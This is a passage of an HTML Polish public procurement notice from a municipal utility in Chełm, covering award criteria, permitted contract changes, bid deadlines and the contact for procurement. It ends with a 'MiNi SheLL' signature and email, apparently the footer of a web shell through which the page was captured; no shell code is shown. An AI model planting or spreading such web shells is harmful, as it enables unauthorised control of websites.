<li>1 - Cena - 80</li>
<li>2 - Termin dostawy liczony w dniach od dnia zawarcia umowy - 15</li>
<li>3 - Zużycie energii obliczone na podstawie zużycia paliwa - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa, którą zamawiający podpisze z wybranym wykonawcą zawarta jest jako wzór w załączniku nr 5. 
2.  Rozliczenie  w  okresie  trwania  umowy  pomiędzy  zamawiającym  i  wykonawcą  będzie  realizowane  wyłącznie  w 
walucie polskiej. 
3. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na 
podstawie której dokonano wyboru wykonawcy w zakresie wysokości wynagrodzenia w następujących przypadkach:  
1) Ustawowej zmiany podatku od  towarów  i usług  (VAT),  zmiana wynagrodzenia wykonawcy z  tego  tytułu obejmuje 
dostawy wykonane po dacie wejścia w życie przepisów regulujących zmiany. 
2)  Zamawiający  dopuszcza możliwość  zmiany  umowy,  gdy  nastąpi  zmiana  powszechnie  obowiązujących  przepisów 
prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia. 
3) Zamawiający dopuszcza  także  inne podobne  zmiany umowy w przypadku gdy  zmiana pozostaje w bezpośrednim 
związku  przyczynowo  skutkowym  z wystąpieniem  danych  okoliczności  i  nie wykracza  poza  to  co  konieczne w  celu 
przeciwdziałania skutkom takiej zmiany okoliczności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgk.chelm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Chełmie, 22-100 Chełm, ul. Wołyńska 57, pokój 32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2015 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Chełmie, 22-100 Chełm, ul. Wołyńska 57, pokój 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie zastrzega żadnej części zamówienia do obowiązku osobistego wykonania przez wykonawcę. 
2. Zamawiający dopuszcza powierzenie wykonania części zamówienia podwykonawcom. Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom. 
3. Szczegółowe warunki współpracy między zamawiającym, wykonawcą i podwykonawcą określone są w załączniku nr 5 do DIWZ.
4. Do porozumiewania się z wykonawcami uprawniony jest: 
Kierownik Działu Zamówień Publicznych i Zakupów - Tomasz Szajkowski. 
MPGK Sp. z o.o. Chełm, ul. Wołyńska 57, codziennie od poniedziałku do piątku  w godz. 7:30  - 14:30. E-mail:  tomasz.szajkowski@mpgk.chelm.pl, fax: 82 563 03 45.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com